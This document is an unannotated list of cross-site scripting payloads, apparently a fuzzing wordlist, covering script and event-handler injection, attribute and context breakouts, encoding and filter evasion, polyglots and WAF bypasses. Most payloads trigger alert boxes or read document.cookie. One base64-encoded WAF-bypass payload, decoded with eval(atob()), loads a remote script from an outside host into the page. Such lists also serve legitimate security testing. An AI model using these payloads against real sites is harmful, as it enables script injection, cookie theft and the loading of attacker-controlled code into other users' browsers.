# XSS Payloads
# Basic script payloads
<script>alert('XSS')</script>
<script>alert("XSS")</script>
<script>alert(/XSS/)</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

# Event handler payloads
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>
<img src=x onerror="alert('XSS')">
<svg onload=alert('XSS')>
<body onload=alert('XSS')>
<input type="text" onmouseover="alert('XSS')">
<iframe src="javascript:alert('XSS')"></iframe>

# HTML attribute payloads
" onmouseover="alert('XSS')
' onmouseover='alert("XSS")
" autofocus onfocus="alert('XSS')
' autofocus onfocus='alert("XSS")

# JavaScript protocol payloads
javascript:alert('XSS')
javascript:alert("XSS")
javascript:alert(/XSS/)
JaVaScRiPt:alert('XSS')

# Filter evasion payloads
<ScRiPt>alert('XSS')</ScRiPt>
<script>ale\u0072t('XSS')</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>
<img src="x" onerror="alert('XSS')">
<svg><script>alert('XSS')</script></svg>

# DOM-based payloads
#<script>alert('XSS')</script>
";alert('XSS');var x="
';alert('XSS');var x='
</script><script>alert('XSS')</script>

# Polyglot payloads
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>
'">`><marquee><img src=x onerror=confirm('XSS')></marquee></plaintext\></|\><plaintext/onmouseover=prompt('XSS')><script>prompt('XSS')</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'--></script><script>alert('XSS')</script>

# HTML5 payloads
<details open ontoggle=alert('XSS')>
<marquee onscroll=alert('XSS')>
<video><source onerror="alert('XSS')">
<audio src=x onerror=alert('XSS')>

# CSS-based payloads
<style>@import'javascript:alert("XSS")';</style>
<style>body{background:url("javascript:alert('XSS')")}</style>
<link rel="stylesheet" href="javascript:alert('XSS')">

# XML/SVG payloads
<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"></svg>
<math><mi//xlink:href="data:x,<script>alert('XSS')</script>">
<foreignObject><iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('XSS')"></iframe></foreignObject>

# Encoded payloads
%3Cscript%3Ealert('XSS')%3C/script%3E
&lt;script&gt;alert('XSS')&lt;/script&gt;
<script>alert(&#39;XSS&#39;)</script>
<script>\u0061lert('XSS')</script>

# Template injection payloads
{{alert('XSS')}}
${alert('XSS')}
<%=alert('XSS')%>
#{alert('XSS')}

# Context-specific payloads
';alert('XSS');//
";alert('XSS');//
</title><script>alert('XSS')</script>
</textarea><script>alert('XSS')</script>
--><script>alert('XSS')</script><!--

# WAF bypass payloads
<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzLXN0cmlrZS5jb20vUWpyNHlwdCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
<iframe srcdoc="<script>parent.alert('XSS')</script>">
<object data="javascript:alert('XSS')">
<embed src="javascript:alert('XSS')">

